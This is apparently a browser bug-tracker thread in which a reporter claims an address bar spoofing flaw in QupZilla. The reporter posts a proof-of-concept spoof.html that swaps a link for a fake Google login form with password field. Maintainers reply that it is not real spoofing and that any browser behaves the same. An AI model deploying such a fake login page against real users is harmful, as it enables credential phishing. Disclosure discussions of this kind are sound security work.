Address bar spoofing

[RootUp]

Hi Team,

A security issue was observed while performing bulk test-cases on qupzilla browser.

Steps to reproduce the issue:

1. Open qupzilla
2. Open spoof.html
3. Drag the link to address bar.

The Omini bar get spoofed, to https://www.account.google.com/ such attack will help attacker to perform attacks such as phishing.

spoof.html

<body onbeforeunload="dostuff()">
<div id='pg1'>
<a href='https://accounts.google.com:8091/'>Drag me into the address bar!</a>
</div>
<div id='pg2' style="display: none">
<h1>Welcome to Legitimate Google Login Page</h1>
<p>
<span style="width: 20ex; display: inline-block">Login:</span> <input type=text><br>
<span style="width: 20ex; display: inline-block">Password:</span> <input type=password>
<p>
<input type=submit>
</div>

<script>
function dostuff() {
  document.getElementById('pg1').style.display = 'none';
  setTimeout("document.getElementById('pg2').style.display = 'block'", 1000);
}
</script>

Request team, to please have a look.

Thank you!

[nowrep]

It doesn't get "spoofed", it actually loads https://accounts.google.com:8091/ and it is indicated by the spinner.

[RootUp]

I see, so are we going for a fix for this.

[andr222]

Le 2018-04-23 à 05:02, Dhiraj Mishra a écrit :

I see, so are we going for a fix for this.

umm ... anyone who loads that page on ANY browser will see exactly the same thing. The only 'fix' would be to not open that page. Or at least to not follow the link it presents. (Like looking at the adress of the link before following it. Readily done with Qupzilla/Falkon and most other browsers.)

…

-- André